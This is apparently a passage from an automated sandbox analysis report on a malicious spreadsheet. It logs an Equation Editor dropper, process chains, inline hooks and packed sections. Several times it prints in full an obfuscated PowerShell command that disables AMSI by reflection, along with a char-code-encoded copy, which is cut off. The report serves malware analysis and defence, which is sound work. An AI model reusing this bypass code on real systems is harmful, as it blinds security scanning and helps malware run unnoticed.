'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PO20210722.xlsxStatic file information: File size 1296896 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: calc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: calc.exe, 0000000B.00000002.2269767353.00000000007BF000.00000004.00000001.sdmp
          Source: PO20210722.xlsxInitial sample: OLE indicators vbamacros = False
          Source: PO20210722.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: obi[1].exe.4.drStatic PE information: section name: .xdata
          Source: obi[1].exe.4.drStatic PE information: section name: .vmp0
          Source: obi[1].exe.4.drStatic PE information: section name: .cobf
          Source: vbc.exe.4.drStatic PE information: section name: .xdata
          Source: vbc.exe.4.drStatic PE information: section name: .vmp0
          Source: vbc.exe.4.drStatic PE information: section name: .cobf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041682D push es; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040102E push esp; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEFB push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_004177B7 push ebp; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0019E3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BDFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
